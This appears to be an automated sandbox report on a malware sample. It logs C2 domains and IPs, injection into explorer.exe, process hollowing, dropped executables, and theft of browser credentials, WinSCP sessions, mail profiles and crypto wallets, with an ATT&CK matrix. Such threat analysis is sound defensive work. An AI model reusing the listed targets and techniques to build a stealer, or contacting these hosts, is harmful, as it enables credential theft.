    Source: C:\Windows\explorer.exeNetwork Connect: 23.106.124.133 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: cdn-153.hotfile.io
    Source: C:\Windows\explorer.exeNetwork Connect: 58.235.189.192 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 199.36.158.100 443Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: uaery.top
    Source: C:\Windows\explorer.exeNetwork Connect: 80.85.241.98 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 195.96.151.46 443Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: beg.com.ve
    Source: C:\Windows\explorer.exeNetwork Connect: 176.61.150.108 443Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: bit.ly
    Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: shorturl.at
    Source: C:\Windows\explorer.exeDomain query: hotfile.io
    Source: C:\Windows\explorer.exeNetwork Connect: 104.234.118.34 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 86.122.83.142 80Jump to behavior
    Source: C:\Windows\explorer.exeDomain query: transfer.sh
    Source: C:\Windows\explorer.exeDomain query: autoacores.com
    Source: C:\Windows\explorer.exeFile created: FD42.exe.1.drJump to dropped file
    Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\rirdbihSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\rirdbihSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\F207.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\F207.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\849F.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
    Source: C:\Users\user\AppData\Local\Temp\849F.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeMemory written: C:\Users\user\AppData\Local\Temp\A4A.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeMemory written: C:\Users\user\AppData\Local\Temp\ECAC.exe base: 400000 value starts with: 4D5A
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeMemory written: C:\Users\user\AppData\Local\Temp\DC3D.exe base: 400000 value starts with: 4D5A
    Source: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exeMemory written: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe base: 400000 value starts with: 4D5A
    Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 2FD1B14Jump to behavior
    Source: C:\Users\user\AppData\Roaming\rirdbihThread created: unknown EIP: 5001B14Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\F207.exeThread created: unknown EIP: 2DD19A0Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\849F.exeThread created: unknown EIP: 4FE1A98
    Source: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exeSection unmapped: unknown base address: 400000
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25F380Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25F380Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25F380Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25F380Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25F380Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25F380Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 5212 base: 25F380 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 2396 base: 7FF647908150 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 5488 base: 25F380 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 5412 base: 7FF647908150 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 5696 base: 25F380 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 2984 base: 25F380 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 3028 base: 25F380 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 4144 base: 7FF647908150 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 1816 base: 25F380 value: 90Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess created: C:\Users\user\AppData\Local\Temp\A4A.exe C:\Users\user\AppData\Local\Temp\A4A.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8EAD.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess created: C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe "C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe"
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess created: C:\Users\user\AppData\Local\Temp\ECAC.exe C:\Users\user\AppData\Local\Temp\ECAC.exe
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess created: C:\Users\user\AppData\Local\Temp\DC3D.exe C:\Users\user\AppData\Local\Temp\DC3D.exe
    Source: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exeProcess created: unknown unknown
    Source: explorer.exe, 00000001.00000000.261317876.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
    Source: explorer.exe, 00000001.00000000.269690947.000000000835D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.261317876.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000003.267443318.0000000008356000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: rundll32.exe, 0000000C.00000003.378460186.00000156F17A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
    Source: explorer.exe, 00000001.00000000.261007247.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.261317876.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000001.00000000.261317876.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: rundll32.exe, 0000000C.00000003.378460186.00000156F17A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: GetLocaleInfoA,9_2_0040C1AC
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeQueries volume information: C:\Users\user\AppData\Local\Temp\42FE.exe VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\352F.exeQueries volume information: C:\Users\user\AppData\Local\Temp\352F.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_00408F3D cpuid 9_2_00408F3D
    Source: C:\Windows\System32\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_00408266 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_00408266
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AFB92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,12_2_00007DF449AFB92C
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_0040513D GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,9_2_0040513D

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000017.00000002.422932129.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.287959121.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.375723572.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000017.00000002.422753808.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.395645778.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.288034610.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.395590082.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: 1128.exe PID: 4608, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5500, type: MEMORYSTR
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-QtJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
    Source: rundll32.exe, 0000000C.00000003.464122815.00000156F1751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framework.parse_path([[%AppData%\Qtum-Electrum\config]]v)hJ
    Source: rundll32.exe, 0000000C.00000002.573886364.00000156EF77F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\ElectronCash\config
    Source: rundll32.exe, 0000000C.00000003.352788321.00000156F14A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framework.parse_path([[%AppData%\com.liberty.jaxx]]),
    Source: rundll32.exe, 0000000C.00000003.352788321.00000156F14A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framework.parse_path([[%AppData%\Exodus\exodus.wallet]]),
    Source: rundll32.exe, 0000000C.00000003.352788321.00000156F14A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framework.parse_path([[%AppData%\Exodus\exodus.wallet]]),
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5500, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000017.00000002.422932129.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.287959121.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.375723572.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000017.00000002.422753808.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.395645778.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.288034610.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.395590082.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: 1128.exe PID: 4608, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5500, type: MEMORYSTR
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AFB92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,12_2_00007DF449AFB92C
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B248E4 socket,bind,12_2_00007DF449B248E4
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    1
    Spearphishing Link
    11
    Windows Management Instrumentation
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Disable or Modify Tools
    1
    OS Credential Dumping
    1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium14
    Ingress Tool Transfer
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts2
    Native API
    1
    Registry Run Keys / Startup Folder
    713
    Process Injection
    11
    Obfuscated Files or Information
    21
    Input Capture
    3
    File and Directory Discovery
    Remote Desktop Protocol2
    Data from Local System
    Exfiltration Over Bluetooth21
    Encrypted Channel
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts1
    Shared Modules
    1
    Services File Permissions Weakness
    1
    Registry Run Keys / Startup Folder
    32
    Software Packing
    1
    Credentials in Registry
    58
    System Information Discovery
    SMB/Windows Admin Shares1
    Email Collection
    Automated Exfiltration4
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local Accounts1
    Exploitation for Client Execution
    Logon Script (Mac)1
    Services File Permissions Weakness
    1
    Timestomp
    NTDS1
    Query Registry
    Distributed Component Object Model21
    Input Capture
    Scheduled Transfer125
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud Accounts2
    Command and Scripting Interpreter
    Network Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets441
    Security Software Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    File Deletion
    Cached Domain Credentials131
    Virtualization/Sandbox Evasion
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items11
    Masquerading
    DCSync13
    Process Discovery
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job131
    Virtualization/Sandbox Evasion
    Proc Filesystem1
    Application Window Discovery
    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)713
    Process Injection
    /etc/passwd and /etc/shadow1
    Remote System Discovery
    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
    Hidden Files and Directories
    Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
    Services File Permissions Weakness
    Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
    Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
    Rundll32
    KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 808616 Sample: file.exe Startdate: 15/02/2023 Architecture: WINDOWS Score: 100 81 uaery.top 2->81 83 api.2ip.ua 2->83 109 Snort IDS alert for network traffic 2->109 111 Malicious sample detected (through community Yara rule) 2->111 113 Antivirus detection for URL or domain 2->113 115 13 other signatures 2->115 10 file.exe 2->10         started        13 rirdbih 2->13         started        15 A4A.exe 2->15         started        signatures3 process4 signatures5 149 Detected unpacking (changes PE section rights) 10->149 151 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->151 153 Maps a DLL or memory area into another process 10->153 155 Creates a thread in another existing process (thread injection) 10->155 17 explorer.exe 12 47 10->17 injected 157 Multi AV Scanner detection for dropped file 13->157 159 Machine Learning detection for dropped file 13->159 161 Checks if the current machine is a virtual machine (disk enumeration) 13->161 process6 dnsIp7 75 perficut.at 17->75 77 95.158.162.200 VIDEOSATBG Bulgaria 17->77 79 25 other IPs or domains 17->79 59 C:\Users\user\AppData\Roaming\sardbih, PE32 17->59 dropped 61 C:\Users\user\AppData\Roaming\rirdbih, PE32 17->61 dropped 63 C:\Users\user\AppData\Roaming\gdrdbih, PE32 17->63 dropped 65 17 other malicious files 17->65 dropped 117 System process connects to network (likely due to code injection or exploit) 17->117 119 Benign windows process drops PE files 17->119 121 Performs DNS queries to domains with low reputation 17->121 123 4 other signatures 17->123 22 1128.exe 2 17->22         started        26 42FE.exe 4 17->26         started        28 F207.exe 17->28         started        30 10 other processes 17->30 file8 signatures9 process10 file11 67 C:\Users\user\AppData\...\vcredist_5f4680.dll, PE32+ 22->67 dropped 125 Multi AV Scanner detection for dropped file 22->125 127 Detected unpacking (creates a PE file in dynamic memory) 22->127 129 Machine Learning detection for dropped file 22->129 32 rundll32.exe 2 22->32         started        36 conhost.exe 22->36         started        69 C:\Users\user\AppData\...\yuzhenzhang.exe, PE32 26->69 dropped 71 C:\Users\user\AppData\Local\...\llpb1133.exe, PE32+ 26->71 dropped 131 Antivirus detection for dropped file 26->131 38 llpb1133.exe 26->38         started        41 yuzhenzhang.exe 26->41         started        133 Detected unpacking (changes PE section rights) 28->133 135 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 28->135 137 Maps a DLL or memory area into another process 28->137 139 Creates a thread in another existing process (thread injection) 28->139 73 C:\Users\user\AppData\...\svcupdater.exe, PE32 30->73 dropped 141 Detected unpacking (overwrites its own PE header) 30->141 143 Sample uses process hollowing technique 30->143 145 Checks if the current machine is a virtual machine (disk enumeration) 30->145 147 Injects a PE file into a foreign processes 30->147 43 llpb1133.exe 30->43         started        45 A4A.exe 30->45         started        47 ECAC.exe 30->47         started        49 3 other processes 30->49 signatures12 process13 dnsIp14 55 C:\Users\user\AppData\Local\...\170F.tmp.exe, PE32 32->55 dropped 97 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 32->97 99 Tries to steal Mail credentials (via file / registry access) 32->99 101 Tries to harvest and steal browser information (history, passwords, etc) 32->101 107 2 other signatures 32->107 85 157.240.252.35 FACEBOOKUS United States 38->85 87 157.240.253.35 FACEBOOKUS United States 38->87 89 45.66.159.142 ENZUINC-US Russian Federation 38->89 103 Multi AV Scanner detection for dropped file 38->103 105 Machine Learning detection for dropped file 38->105 51 conhost.exe 41->51         started        91 157.240.17.35 FACEBOOKUS United States 43->91 93 api.2ip.ua 162.0.217.254 ACPCA Canada 45->93 57 C:\Users\user\AppData\Local\...\A4A.exe, PE32 45->57 dropped 53 icacls.exe 45->53         started        95 192.168.2.1 unknown unknown 49->95 file15 signatures16 process17

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.